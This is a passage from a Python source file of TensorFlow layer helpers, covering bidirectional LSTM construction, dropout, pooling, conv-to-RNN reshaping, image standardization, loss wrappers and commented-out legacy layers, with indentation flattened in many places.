print('Time major false not supported for variable sequence length.')
# forward direction
with tf.compat.v1.variable_scope("culstm_forward"):
# if cell_type == 'LSTM':
# curnn_fw = tf.keras.layers.lst(num_layers=1, num_units=n_hidden, direction="unidirectional", dtype=tf.float32)
# if cell_type == 'GRU':
# raise NotImplementedError
# # curnn_fw = CudnnGRU(num_layers=1, num_units=n_hidden, direction="unidirectional", dtype=tf.float32)
# curnn_fw.build(inputs.get_shape())
# outputs_fw, _ = curnn_fw(inputs, training=training)
culstm_fw = tf.keras.layers.LSTM(units=n_hidden, return_sequences=True)
culstm_fw.build(inputs.get_shape())
outputs_fw = culstm_fw(inputs, training=is_training)
# backward direction
with tf.compat.v1.variable_scope("culstm_backward"):
# if cell_type == 'LSTM':
# curnn_bw = CudnnLSTM(num_layers=1, num_units=n_hidden, direction="unidirectional", dtype=tf.float32)
# if cell_type == 'GRU':
# raise NotImplementedError
# curnn_bw = CudnnGRU(num_layers=1, num_units=n_hidden, direction="unidirectional", dtype=tf.float32)
# curnn_bw.build(inputs.get_shape())
# reverse_inputs = tf.reverse_sequence(inputs, seq_length, batch_axis=1, seq_axis=0)
# outputs_bw, _ = curnn_bw(reverse_inputs, training=training)
# outputs_bw = tf.reverse_sequence(outputs_bw, seq_length, batch_axis=1, seq_axis=0)
culstm_bw = tf.keras.layers.LSTM(units=n_hidden, return_sequences=True)
culstm_bw.build(inputs.get_shape())
reverse_inputs = tf.reverse_sequence(inputs, seq_length, batch_axis=1, seq_axis=0)
outputs_bw = culstm_bw(reverse_inputs, training=is_training)
outputs_bw = tf.reverse_sequence(outputs_bw, seq_length, batch_axis=1, seq_axis=0)
# concat
outputs = tf.concat([outputs_fw, outputs_bw], axis=2)
else:
raise NotImplementedError("There is no else!")
# from tensorflow.python.ops.rnn import dynamic_rnn as rnn
# if cell_type == 'LSTM':
# single_cell = lambda: LSTMCell(n_hidden, reuse=tf.compat.v1.get_variable_scope().reuse)
# if cell_type == 'GRU':
# single_cell = lambda: GRUCell(n_hidden, reuse=tf.compat.v1.get_variable_scope().reuse)
# # forward direction
# with tf.compat.v1.variable_scope("culstm_forward"):
# cell_fw = MultiRNNCell([single_cell() for _ in range(1)])
# outputs_fw, _ = rnn(cell_fw, inputs, dtype=tf.float32, time_major=True)
# # backward direction
# with tf.compat.v1.variable_scope("culstm_backward"):
# cell_bw = MultiRNNCell([single_cell() for _ in range(1)])
# reverse_inputs = tf.reverse_sequence(inputs, seq_length, batch_axis=1, seq_axis=0)
# outputs_bw, _ = rnn(cell_bw, reverse_inputs, dtype=tf.float32, time_major=True)
# outputs_bw = tf.reverse_sequence(outputs_bw, seq_length, batch_axis=1, seq_axis=0)
# # concat
# outputs = tf.concat([outputs_fw, outputs_bw], axis=2)
return outputs
# TODO Check this. Is CuDNN v3 not working???? Version depends on seq_length and time_major...
# with tf.compat.v1.variable_scope(name):
# if use_cudnn:
# # if not time_major:
# # print('Time major false not supported for variable sequence length.')
# if cell_type == 'LSTM':
# curnn = CudnnLSTM(num_layers=1, num_units=n_hidden, direction="bidirectional", dtype=tf.float32)
# if cell_type == 'GRU':
# curnn = CudnnGRU(num_layers=1, num_units=n_hidden, direction="bidirectional", dtype=tf.float32)
# curnn.build(inputs.get_shape())
# # outputs, _ = curnn(inputs, training=training, sequence_lengths=seq_length, time_major=time_major)
# outputs, _ = curnn(inputs, training=training, time_major=time_major, sequence_lengths=seq_length)
# # culstm_fw = tf.keras.layers.CuDNNLSTM(units=n_hidden, return_sequences=True)
# # culstm_fw.build(inputs.get_shape())
# # outputs_fw = culstm_fw(inputs, training=training)
# else:
# if cell_type == 'LSTM':
# single_cell = lambda: LSTMCell(n_hidden, reuse=tf.compat.v1.get_variable_scope().reuse)
# if cell_type == 'GRU':
# single_cell = lambda: GRUCell(n_hidden, reuse=tf.compat.v1.get_variable_scope().reuse)
# cells_fw = [single_cell() for _ in range(1)]
# cells_bw = [single_cell() for _ in range(1)]
# outputs, _, _ = stack_bidirectional_dynamic_rnn(cells_fw, cells_bw, inputs, dtype=tf.float32,
# sequence_length=seq_length,
# time_major=time_major)
# return outputs
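# Usage sketch for b_rnn_layer (assumed shapes, not taken from the original code): the layer
# expects time-major input [max_time, batch_size, features_in] and returns
# [max_time, batch_size, 2 * n_hidden] (forward and backward outputs concatenated).
#
#   rnn_in = conv_to_rnn(conv_out)                                   # [X, batch, Y*Z]
#   rnn_out = b_rnn_layer(rnn_in, is_training=True, n_hidden=256,
#                         seq_length=seq_len)                        # [X, batch, 512]
#   merged = brnn_direction_merge_sum(rnn_out)                       # [X, batch, 256]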
def MultiRNNCell(cells, state_is_tuple=True):
    return tf.compat.v1.nn.rnn_cell.MultiRNNCell(cells, state_is_tuple=state_is_tuple)
# def LSTMCell(num_units, reuse=None):
# return CudnnCompatibleLSTMCell(num_units=num_units, reuse=reuse)
#
#
# def GRUCell(num_units, reuse=None):
# return CudnnCompatibleGRUCell(num_units=num_units, reuse=reuse)
def DropoutWrapper(cell, input_keep_prob=1.0, output_keep_prob=1.0, state_keep_prob=1.0):
return tf.compat.v1.nn.rnn_cell.DropoutWrapper(cell, input_keep_prob=input_keep_prob,
output_keep_prob=output_keep_prob,
state_keep_prob=state_keep_prob)
# </editor-fold>
# </editor-fold>
# <editor-fold desc="NOT Trainable Layers (dropout, avg_pool1d, avg_pool2d, max_pool1d, max_pool2d, embedding_lookup, moments, top_k, conv_to_rnn, brnn_direction_merge_sum, brnn_direction_merge_sum_to_conv, normalize, upsample_simple, per_image_standardization)">
def dropout(inputs, is_training, rate=None, keep_prob=None, noise_shape=None, name="dropout", keras_model=None):
    if rate is not None and keep_prob is not None:
        print("ERROR: Use either keep_prob or rate for dropout!")
        exit(1)
    if keep_prob is not None:
        rate = 1.0 - keep_prob
    if keras_model is not None:
        # lazily create the keras Dropout layer once and cache it on the surrounding model
        if not keras_model._built and name not in keras_model._tracked_layers:
            keras_model._tracked_layers[name] = tf.keras.layers.Dropout(rate=rate, noise_shape=noise_shape,
                                                                        name=name)
        if is_training:
            return keras_model._tracked_layers[name](inputs, training=True)
        return inputs
    # no keras model given (e.g. calls from the conv layers above): fall back to the functional op
    if is_training and rate:
        return tf.nn.dropout(inputs, rate=rate, noise_shape=noise_shape, name=name)
    return inputs
def avg_pool1d(inputs,
kernel_width,
stride_width,
padding='SAME',
name="avg_pool1d"):
with tf.compat.v1.variable_scope(name):
inputs = tf.expand_dims(inputs, axis=1)
outputs = avg_pool2d(inputs, ksize=[1, 1, kernel_width, 1], strides=[1, 1, stride_width, 1],
padding=padding)
outputs = tf.squeeze(outputs, axis=1)
return outputs
def avg_pool2d(inputs, ksize, strides, padding, name='avg_pool2d'):
return tf.nn.avg_pool2d(inputs, ksize=ksize, strides=strides, padding=padding, name=name)
def max_pool1d(inputs,
kernel_width,
stride_width,
padding='SAME',
name="max_pool1d"):
with tf.compat.v1.variable_scope(name):
inputs = tf.expand_dims(inputs, axis=1)
outputs = max_pool2d(inputs, ksize=[1, 1, kernel_width, 1], strides=[1, 1, stride_width, 1],
padding=padding)
outputs = tf.squeeze(outputs, axis=1)
return outputs
def max_pool2d(inputs, ksize, strides, padding, name='max_pool2d'):
return tf.nn.max_pool2d(inputs, ksize=ksize, strides=strides, padding=padding, name=name)
def embedding_lookup(params,
ids,
partition_strategy="mod",
name=None,
validate_indices=True, # pylint: disable=unused-argument
max_norm=None):
    return tf.compat.v1.nn.embedding_lookup(params, ids, partition_strategy=partition_strategy, name=name,
                                            validate_indices=validate_indices, max_norm=max_norm)
def moments(x, axes, shift=None, name=None, keep_dims=None, keepdims=None):
    return tf.compat.v1.nn.moments(x,
                                   axes,
                                   shift=shift,  # pylint: disable=unused-argument
                                   name=name,
                                   keep_dims=keep_dims,
                                   keepdims=keepdims)
def top_k(input, k=1, sorted=True, name=None):
return tf.nn.top_k(input, k=k, sorted=sorted, name=name)
def conv_to_rnn(conv_out, time_major=True, data_format='NHWC', name='conv_to_rnn'):
"""
    Adds a utility layer to transform the output Tensor of a convolutional layer into a Tensor which fits an RNN.
    This function assumes that `time_major` matches the time-major setting of the subsequent RNN.
Args:
conv_out: `4-D Tensor`, the output of a convolutional layer with its shaped determined by `data_format`:
For 'NHWC' it is assumed that `conv_out` is stored in the order of `[batch_size, Y, X, Z]`.
For 'NCHW' it is assumed that `conv_out` is stored in the order of `[batch_size, Z, Y, X]`.
time_major: `bool` [batch_size, time, depth] vs [time, batch_size, depth].
data_format: `str` from ('NHWC', 'NCHW'), specifies the data format of `conv_out`.
name: `str` or `VariableScope`, the scope to open.
Returns:
`3-D Tensor`, the transformed `conv_out` Tensor with shape `[X, batch_size, Y * Z]` corresponds to
`[max_time, batch_size, cell_size]` for time_major=True.
"""
with tf.compat.v1.variable_scope(name):
if data_format == 'NCHW':
if time_major:
# (batch_size, Z, Y, X) -> (X, batch_size, Y, Z)
rnn_in = tf.transpose(conv_out, [3, 0, 2, 1])
else:
# (batch_size, Z, Y, X) -> (batch_size, X, Y, Z)
rnn_in = tf.transpose(conv_out, [0, 3, 2, 1])
else:
if time_major:
# (batch_size, Y, X, Z) -> (X, batch_size, Y, Z)
rnn_in = tf.transpose(conv_out, [2, 0, 1, 3])
else:
# (batch_size, Y, X, Z) -> (batch_size, X, Y, Z)
rnn_in = tf.transpose(conv_out, [0, 2, 1, 3])
shape_static = rnn_in.get_shape().as_list()
y = shape_static[2]
z = shape_static[3]
shape_dynamic = tf.shape(rnn_in)
dim0 = shape_dynamic[0]
dim1 = shape_dynamic[1]
# (dim0, dim1, Y, Z) -> (dim0, dim1, Y*Z)
rnn_in = tf.reshape(rnn_in, [dim0, dim1, y * z])
# (X, batch_size, Y*Z) corresponds to [max_time, batch_size, cell_size]
return rnn_in
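# Worked example for conv_to_rnn (illustrative shapes, not from the original code):
# an 'NHWC' feature map of shape [batch_size=8, Y=16, X=100, Z=64] is transposed to
# [X, batch_size, Y, Z] = [100, 8, 16, 64] and then reshaped to
# [max_time, batch_size, cell_size] = [100, 8, 16 * 64] = [100, 8, 1024].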
def brnn_direction_merge_sum(rnn_out, time_major_in=True, time_major_out=True, name='brnn_merge_sum'):
"""
Adds a utility layer to transform the output Tensor pair of a bidirectional dynamic RNN into a 3D Tensor,
which sums the both RNN directions
"""
with tf.compat.v1.variable_scope(name):
shape_static = rnn_out.get_shape().as_list()
cell_size = shape_static[2] // 2
shape_dynamic = tf.shape(rnn_out)
dim0 = shape_dynamic[0]
dim1 = shape_dynamic[1]
# [dim0, dim1, 2*cell_size] -> [dim0, dim1, 2, cell_size]
graph_o = tf.reshape(rnn_out, shape=[dim0, dim1, 2, cell_size])
# [dim0, dim1, 2, cell_size] -> [dim0, dim1, cell_size]
graph_o = tf.reduce_sum(graph_o, axis=2)
if time_major_in and time_major_out:
return graph_o
else:
# Since time_major_in != time_major_out we flip the first two dimensions
return tf.transpose(graph_o, [1, 0, 2])
def brnn_direction_merge_sum_to_conv(rnn_out, time_major_in=True, data_format='NHWC', name='brnn_merge_sum_to_conv'):
with tf.compat.v1.variable_scope(name):
# [] -> [batch_size, max_time, cell_size]
output = brnn_direction_merge_sum(rnn_out, time_major_in, time_major_out=False)
# [batch_size, max_time, cell_size] -> [batch_size, cell_size, max_time]
output = tf.transpose(output, [0, 2, 1])
if data_format == 'NHWC':
# [batch_size, cell_size, max_time] -> [batch_size, cell_size, max_time, 1]
return tf.expand_dims(output, axis=3)
# [batch_size, cell_size, max_time, 1] corresponds to [batch_size, Y, X, Z], 'NHWC'
else:
# [batch_size, cell_size, max_time] -> [batch_size, 1, cell_size, max_time]
return tf.expand_dims(output, axis=1)
# [batch_size, 1, cell_size, max_time] corresponds to [batch_size, Z, Y, X], 'NCHW'
def normalize(image, img_length):
# dynamic shape values (calculated during runtime)
shape_dynamic = tf.shape(image)
# static shape values (defined up-front)
shape_static = image.get_shape().as_list()
# image normalization
image_crop = tf.image.crop_to_bounding_box(image, 0, 0, shape_static[0], img_length)
# image_norm = tf.image.per_image_standardization(image_crop)
image_norm = per_image_standardization(image_crop)
# TODO test this
# image_norm = 1.0 - image_norm
image_pad = tf.image.pad_to_bounding_box(image_norm, 0, 0, shape_static[0], shape_dynamic[1])
# image_pad = 1.0 - image_pad
return image_pad
# @tf_export('image.per_image_standardization')  # re-registering TensorFlow's own export name would fail at import
def per_image_standardization(image):
"""Linearly scales `image` to have zero mean and unit norm.
This op computes `(x - mean) / adjusted_stddev`, where `mean` is the average
of all values in image, and
`adjusted_stddev = max(stddev, 1.0/sqrt(image.NumElements()))`.
`stddev` is the standard deviation of all values in `image`. It is capped
away from zero to protect against division by 0 when handling uniform images.
Args:
image: 3-D tensor of shape `[height, width, channels]`.
Returns:
The standardized image with same shape as `image`.
Raises:
ValueError: if the shape of 'image' is incompatible with this function.
"""
with tf.compat.v1.name_scope(None, 'per_image_standardization', [image]) as scope:
image = tf.convert_to_tensor(image, name='image')
# image = _Assert3DImage(image)
# num_pixels = math_ops.reduce_prod(array_ops.shape(image))
# image = math_ops.cast(image, dtype=dtypes.float32)
image_mean = tf.math.reduce_mean(image)
variance = (
tf.math.reduce_mean(tf.math.square(image)) -
tf.math.square(image_mean))
variance = relu(variance)
stddev = tf.math.sqrt(variance)
# Apply a minimum normalization that protects us against uniform images.
# min_stddev = math_ops.rsqrt(1.0 * num_pixels)
pixel_value_scale = tf.math.maximum(stddev, 0.0001)
pixel_value_offset = image_mean
image = tf.math.subtract(image, pixel_value_offset)
image = tf.math.divide(image, pixel_value_scale, name=scope)
# image = math_ops.div(image, pixel_value_scale, name=scope)
return image
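# Worked example (sketch): for image = [[1., 3.], [5., 7.]] with a single channel,
# mean = 4.0, E[x^2] = 21.0, variance = 21.0 - 16.0 = 5.0, stddev = sqrt(5) ~= 2.236,
# so the output is (x - 4.0) / 2.236. For a constant (uniform) image the variance is 0,
# the stddev is clipped to the 1e-4 floor, and the output is all zeros instead of NaN.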
def upsample_simple(images, shape_out, up, numClasses):
filter_up = tf.constant(1.0, shape=[up, up, numClasses, numClasses])
return tf.nn.conv2d_transpose(images, filter_up,
output_shape=shape_out,
strides=[1, up, up, 1])
# </editor-fold>
# <editor-fold desc="Loss Utilities (softmax_cross_entropy_with_logits_v2, sparse_softmax_cross_entropy_with_logits, sigmoid_cross_entropy_with_logits, l2_loss, nce_loss)">
def softmax_cross_entropy_with_logits_v2(labels, logits, axis=None, name=None, dim=None):
    return tf.compat.v1.nn.softmax_cross_entropy_with_logits_v2(labels, logits, axis=axis, name=name, dim=dim)
def sparse_softmax_cross_entropy_with_logits(labels=None, logits=None, name=None, _sentinel=None):
    return tf.compat.v1.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logits, name=name, _sentinel=_sentinel)
def sigmoid_cross_entropy_with_logits(labels=None, logits=None, name=None, _sentinel=None):
    return tf.compat.v1.nn.sigmoid_cross_entropy_with_logits(_sentinel=_sentinel, labels=labels, logits=logits, name=name)
def l2_loss(t, name=None):
return tf.nn.l2_loss(t, name=name)
def nce_loss(weights, biases, labels, inputs, num_sampled, num_classes,
num_true=1,
sampled_values=None,
remove_accidental_hits=False,
partition_strategy="mod",
name="nce_loss"):
    return tf.compat.v1.nn.nce_loss(weights,
                                    biases,
                                    labels,
                                    inputs,
                                    num_sampled,
                                    num_classes,
                                    num_true=num_true,
                                    sampled_values=sampled_values,
                                    remove_accidental_hits=remove_accidental_hits,
                                    partition_strategy=partition_strategy,
                                    name=name)
# </editor-fold>
# <editor-fold desc="Utilities (conv1d_op, conv2d_op)">
def conv1d_op(value=None,
filters=None,
stride=None,
padding=None,
use_cudnn_on_gpu=None,
data_format=None,
name=None,
input=None, # pylint: disable=redefined-builtin
dilations=None):
    return tf.compat.v1.nn.conv1d(value=value,
                                  filters=filters,
                                  stride=stride,
                                  padding=padding,
                                  use_cudnn_on_gpu=use_cudnn_on_gpu,
                                  data_format=data_format,
                                  name=name,
                                  input=input,
                                  dilations=dilations)
def conv2d_op(input,
filter=None,
strides=None,
padding=None,
use_cudnn_on_gpu=True,
data_format="NHWC",
dilations=[1, 1, 1, 1],
name=None):
return tf.compat.v1.nn.conv2d(input,
filter=filter,
strides=strides,
padding=padding,
use_cudnn_on_gpu=use_cudnn_on_gpu,
data_format=data_format,
dilations=dilations,
name=name)
# </editor-fold>
# <editor-fold desc="Backup (old stuff we do not want to delete yet)">
def conv2d_bn_lrn_drop(inputs,
kernel_shape,
is_training,
strides=None,
activation=relu,
use_bn=False,
renorm=False,
use_mvn=False,
use_lrn=False,
keep_prob=1.0,
dropout_maps=False,
initOpt=0,
biasInit=0.1,
padding='SAME',
name="conv2d"):
"""Adds a 2-D convolutional layer given 4-D `inputs` and `kernel` with optional BatchNorm, LocalResponseNorm and Dropout.
Args:
        name: `string` or `VariableScope`, the scope to open.
inputs: `4-D Tensor`, it is assumed that `inputs` is shaped `[batch_size, Y, X, Z]`.
kernel: `4-D Tensor`, [kernel_height, kernel_width, in_channels, out_channels] kernel.
bias: `1-D Tensor`, [out_channels] bias.
strides: list of `ints`, length 4, the stride of the sliding window for each dimension of `inputs`.
activation: activation function to be used (default: `relu`).
use_bn: `bool`, whether or not to include batch normalization in the layer.
is_training: `bool`, whether or not the layer is in training mode. This is only used if `use_bn` == True.
use_lrn: `bool`, whether or not to include local response normalization in the layer.
keep_prob: `double`, dropout keep prob.
dropout_maps: `bool`, If true whole maps are dropped or not, otherwise single elements.
padding: `string` from 'SAME', 'VALID'. The type of padding algorithm used in the convolution.
Returns:
        `4-D Tensor`, has the same type as `inputs`.
"""
with tf.compat.v1.variable_scope(name):
if strides is None:
strides = [1, 1, 1, 1]
stddev = 5e-2
if initOpt == 0:
stddev = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + kernel_shape[3]))
if initOpt == 1:
stddev = 5e-2
if initOpt == 2:
stddev = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
initializer = tf.random_normal_initializer(stddev=stddev)
if initOpt < 0:
initializer = tf.random.truncated_normal_initializer(0.0, -initOpt)
kernel = tf.compat.v1.get_variable("weights", kernel_shape,
initializer=initializer)
conv = conv2d_op(inputs, kernel, strides, padding=padding, name='conv')
bias = tf.compat.v1.get_variable("biases", kernel_shape[3],
initializer=tf.constant_initializer(value=biasInit))
outputs = tf.nn.bias_add(conv, bias, name='preActivation')
if use_bn:
print("WARNING BATCH NORM is deprcated")
raise AttributeError
# outputs = batch_norm(outputs, training=training, scale=True, fused=True, renorm=renorm,
# scope="batchNorm")
if use_mvn:
outputs = feat_norm(outputs, kernel_shape[3])
if activation:
outputs = activation(outputs, name='activation')
if use_lrn:
outputs = tf.nn.local_response_normalization(outputs, name='localResponseNorm')
if is_training:
if dropout_maps:
conv_shape = tf.shape(outputs)
n_shape = tf.stack([conv_shape[0], 1, 1, conv_shape[3]])
                outputs = dropout(outputs, is_training=is_training, keep_prob=keep_prob, noise_shape=n_shape)
else:
outputs = dropout(outputs, keep_prob=keep_prob, is_training=is_training)
return outputs
# def sep_conv2d_bn_lrn_drop(scope_or_name,
# inputs,
# kernel_shape,
# depth_multiplier,
# training,
# strides=None,
# activation=relu,
# use_bn=False,
# renorm=False,
# use_mvn=False,
# use_lrn=False,
# keep_prob=1.0,
# dropout_maps=False,
# initOpt=0,
# biasInit=0.1,
# padding='SAME'):
# if strides is None:
# strides = [1, 1, 1, 1]
# with tf.compat.v1.variable_scope(scope_or_name):
# if initOpt == 0:
# stddev1 = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + 1))
# stddev2 = np.sqrt(2.0 / (kernel_shape[2] + kernel_shape[3]))
# if initOpt == 1:
# stddev1 = 5e-2
# stddev2 = 5e-2
# if initOpt == 2:
# stddev1 = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
# stddev2 = min(np.sqrt(2.0 / (kernel_shape[2])), 5e-2)
# kernel1 = tf.compat.v1.get_variable("weights_sep", [kernel_shape[0], kernel_shape[1], kernel_shape[2], depth_multiplier],
# initializer=tf.random_normal_initializer(stddev=stddev1))
# kernel2 = tf.compat.v1.get_variable("weights_1x1", [1, 1, depth_multiplier*kernel_shape[2], kernel_shape[3]],
# initializer=tf.random_normal_initializer(stddev=stddev2))
#
# conv = tf.nn.separable_conv2d(inputs, depthwise_filter=kernel1, pointwise_filter=kernel2, strides=strides,
# padding=padding, name="sep_conv")
# bias = tf.compat.v1.get_variable("biases", kernel_shape[3],
# initializer=tf.constant_initializer(value=biasInit))
# outputs = tf.nn.bias_add(conv, bias, name='preActivation')
# if use_bn:
# outputs = batch_norm(outputs, training=training, scale=True, fused=True, renorm=renorm,
# scope="batchNorm")
# if use_mvn:
# outputs = feat_norm(outputs, kernel_shape[3])
# if activation:
# outputs = activation(outputs, name='activation')
# if use_lrn:
# outputs = tf.nn.local_response_normalization(outputs, name='localResponseNorm')
# if training:
# if dropout_maps:
# conv_shape = tf.shape(outputs)
# n_shape = tf.stack([conv_shape[0], 1, 1, conv_shape[3]])
# outputs = dropout(outputs, keep_prob=keep_prob, noise_shape=n_shape)
# else:
# outputs = dropout(outputs, keep_prob=keep_prob)
# return outputs
# def dil_conv2d_bn_lrn_drop(scope_or_name,
# inputs,
# kernel_shape,
# rate,
# training,
# activation=relu,
# use_bn=False,
# use_mvn=False,
# use_lrn=True,
# keep_prob=1.0,
# dropout_maps=False,
# initOpt=0, padding="SAME"):
# """Adds a 2-D convolutional layer given 4-D `inputs` and `kernel` with optional BatchNorm, LocalResponseNorm and Dropout.
#
# Args:
# scope_or_name: `string` or `VariableScope`, the scope to open.
# inputs: `4-D Tensor`, it is assumed that `inputs` is shaped `[batch_size, Y, X, Z]`.
# kernel: `4-D Tensor`, [kernel_height, kernel_width, in_channels, out_channels] kernel.
# bias: `1-D Tensor`, [out_channels] bias.
# rate: `int`, Dilation factor.
# activation: activation function to be used (default: `relu`).
# use_bn: `bool`, whether or not to include batch normalization in the layer.
# training: `bool`, whether or not the layer is in training mode. This is only used if `use_bn` == True.
# use_lrn: `bool`, whether or not to include local response normalization in the layer.
# keep_prob: `double`, dropout keep prob.
# dropout_maps: `bool`, If true whole maps are dropped or not, otherwise single elements.
# padding: `string` from 'SAME', 'VALID'. The type of padding algorithm used in the convolution.
#
# Returns:
# `4-D Tensor`, has the same type `inputs`.
# """
# with tf.compat.v1.variable_scope(scope_or_name):
# if initOpt == 0:
# stddev = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + kernel_shape[3]))
# if initOpt == 1:
# stddev = 5e-2
# if initOpt == 2:
# stddev = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
# kernel = tf.compat.v1.get_variable("weights", kernel_shape,
# initializer=tf.random_normal_initializer(stddev=stddev))
# conv = tf.nn.atrous_conv2d(inputs, kernel, rate=rate, padding=padding)
# bias = tf.compat.v1.get_variable("bias", kernel_shape[3],
# initializer=tf.constant_initializer(value=0.1))
# outputs = tf.nn.bias_add(conv, bias, name='preActivation')
# if use_bn:
# outputs = batch_norm(outputs, training=training, scale=True, fused=True, scope="batchNorm")
# if use_mvn:
# outputs = feat_norm(outputs, kernel_shape[3])
# if activation:
# outputs = activation(outputs, name='activation')
# if use_lrn:
# outputs = tf.nn.local_response_normalization(outputs, name='localResponseNorm')
# if training:
# if dropout_maps:
# conv_shape = tf.shape(outputs)
# n_shape = tf.stack([conv_shape[0], 1, 1, conv_shape[3]])
# outputs = dropout(outputs, keep_prob=keep_prob, noise_shape=n_shape)
# else:
# outputs = dropout(outputs, keep_prob=keep_prob)
# return outputs
# def deconv2d_bn_lrn_drop(scope_or_name, inputs, kernel_shape, out_shape, training, subS=2, activation=relu,
# use_bn=False,
# use_mvn=False,
# use_lrn=False,
# keep_prob=1.0,
# dropout_maps=False,
# initOpt=0):
# with tf.compat.v1.variable_scope(scope_or_name):
# if initOpt == 0:
# stddev = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + kernel_shape[3]))
# if initOpt == 1:
# stddev = 5e-2
# if initOpt == 2:
# stddev = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
# kernel = tf.compat.v1.get_variable("weights", kernel_shape,
# initializer=tf.random_normal_initializer(stddev=stddev))
# bias = tf.compat.v1.get_variable("bias", kernel_shape[2],
# initializer=tf.constant_initializer(value=0.1))
# conv = tf.nn.conv2d_transpose(inputs, kernel, out_shape, strides=[1, subS, subS, 1], padding='SAME',
# name='conv')
# outputs = tf.nn.bias_add(conv, bias, name='preActivation')
# if use_bn:
# outputs = batch_norm(outputs, training=training, scale=True, fused=True, scope="batchNorm")
# if use_mvn:
# outputs = feat_norm(outputs, kernel_shape[3])
# if activation:
# outputs = activation(outputs, name='activation')
# if use_lrn:
# outputs = tf.nn.local_response_normalization(outputs, name='localResponseNorm')
# if training:
# if dropout_maps:
# conv_shape = tf.shape(outputs)
# n_shape = tf.stack([conv_shape[0], 1, 1, conv_shape[3]])
# outputs = dropout(outputs, keep_prob=keep_prob, noise_shape=n_shape)
# else:
# outputs = dropout(outputs, keep_prob=keep_prob)
# return outputs
# def cublstm_fix(scope_or_name,
# inputs,
# seq_length,
# n_hidden,
# training,
# use_bn=False,
# use_gpu=True, ):
# with tf.compat.v1.variable_scope(scope_or_name):
# if use_gpu:
# # forward direction
# with tf.compat.v1.variable_scope("culstm_forward"):
# culstm_fw = CudnnLSTM(num_layers=1, num_units=n_hidden, direction="unidirectional",
# dtype=tf.float32)
# culstm_fw.build(inputs.get_shape())
# outputs_fw, _ = culstm_fw(inputs, training=True)
# # culstm_fw = tf.keras.layers.CuDNNLSTM(units=n_hidden, return_sequences=True)
# # culstm_fw.build(inputs.get_shape())
# # outputs_fw = culstm_fw(inputs, training=training)
# # backward direction
# with tf.compat.v1.variable_scope("culstm_backward"):
# culstm_bw = CudnnLSTM(num_layers=1, num_units=n_hidden, direction="unidirectional",
# dtype=tf.float32)
# culstm_bw.build(inputs.get_shape())
# reverse_inputs = tf.reverse_sequence(inputs, seq_length, batch_axis=1, seq_axis=0)
# outputs_bw, _ = culstm_bw(reverse_inputs, training=True)
# outputs_bw = tf.reverse_sequence(outputs_bw, seq_length, batch_axis=1, seq_axis=0)
# # culstm_bw = tf.keras.layers.CuDNNLSTM(units=n_hidden, return_sequences=True)
# # culstm_bw.build(inputs.get_shape())
# # reverse_inputs = tf.reverse_sequence(inputs, seq_length, batch_axis=1, seq_axis=0)
# # outputs_bw = culstm_bw(reverse_inputs, training=training)
# # outputs_bw = tf.reverse_sequence(outputs_bw, seq_length, batch_axis=1, seq_axis=0)
# # concat
# outputs = tf.concat([outputs_fw, outputs_bw], axis=2)
#
# else:
# single_cell = lambda: CudnnCompatibleLSTMCell(n_hidden, reuse=tf.compat.v1.get_variable_scope().reuse)
# # forward direction
# with tf.compat.v1.variable_scope("culstm_forward"):
# cell_fw = MultiRNNCell([single_cell() for _ in range(1)])
# outputs_fw, _ = rnn(cell_fw, inputs, dtype=tf.float32, time_major=True)
# # backward direction
# with tf.compat.v1.variable_scope("culstm_backward"):
# cell_bw = MultiRNNCell([single_cell() for _ in range(1)])
# reverse_inputs = tf.reverse_sequence(inputs, seq_length, batch_axis=1, seq_axis=0)
# outputs_bw, _ = rnn(cell_bw, reverse_inputs, dtype=tf.float32, time_major=True)
# outputs_bw = tf.reverse_sequence(outputs_bw, seq_length, batch_axis=1, seq_axis=0)
# # concat
# outputs = tf.concat([outputs_fw, outputs_bw], axis=2)
# # forward direction
# # with tf.compat.v1.variable_scope("culstm_forward"):
# # culstm_fw = tf.keras.layers.LSTM(units=n_hidden,activation='tanh',recurrent_activation='sigmoid', return_sequences=True)
# # culstm_fw.build(inputs.get_shape())
# # outputs_fw = culstm_fw(inputs, training=training)
# # # backward direction
# # with tf.compat.v1.variable_scope("culstm_backward"):
# # culstm_bw = tf.keras.layers.LSTM(units=n_hidden,activation='tanh',recurrent_activation='sigmoid', return_sequences=True)
# # culstm_bw.build(inputs.get_shape())
# # reverse_inputs = tf.reverse_sequence(inputs, seq_length, batch_axis=1, seq_axis=0)
# # outputs_bw = culstm_bw(reverse_inputs, training=training)
# # outputs_bw = tf.reverse_sequence(outputs_bw, seq_length, batch_axis=1, seq_axis=0)
# # # concat
# # outputs = tf.concat([outputs_fw, outputs_bw], axis=2)
# if use_bn:
# outputs = batch_norm(outputs, training=training, scale=True, fused=True, scope="batchNorm")
#
# return outputs
#
#
#
# def cubgru(scope_or_name,
# inputs,
# n_hidden,
# use_gpu=True):
# with tf.compat.v1.variable_scope(scope_or_name):
# if use_gpu:
# lstm = CudnnGRU(num_layers=1, num_units=n_hidden, direction="bidirectional", dtype=tf.float32)
# lstm.build(inputs.get_shape())
# outputs, _ = lstm(inputs, training=True)
# else:
# single_cell = lambda: CudnnCompatibleGRUCell(n_hidden, reuse=tf.compat.v1.get_variable_scope().reuse)
# cells_fw = [single_cell() for _ in range(1)]
# cells_bw = [single_cell() for _ in range(1)]
# outputs, _, _ = stack_bidirectional_dynamic_rnn(cells_fw, cells_bw, inputs, dtype=tf.float32,
# time_major=True)
#
# return outputs
#
# def cubrnn_to_cubrnn(scope_or_name, rnn_out):
# """
# Adds a utility layer to transform the output Tensor of a BRNN into a Tensor which fits a BRNN. This
# function assumes `time_major` == True in both BRNNs.
#
# Args:
# scope_or_name: `str` or `VariableScope`, the scope to open.
# rnn_out: tuple of `3-D Tensors`, length 2, the BRNN output (see tf.nn.bidirectional_dynamic_rnn for
# more information regarding the output format).
#
# Returns:
# `3-D Tensor`, the transformed `rnn_out` Tensor with shape `[max_time, batch_size, cell_size]`.
# """
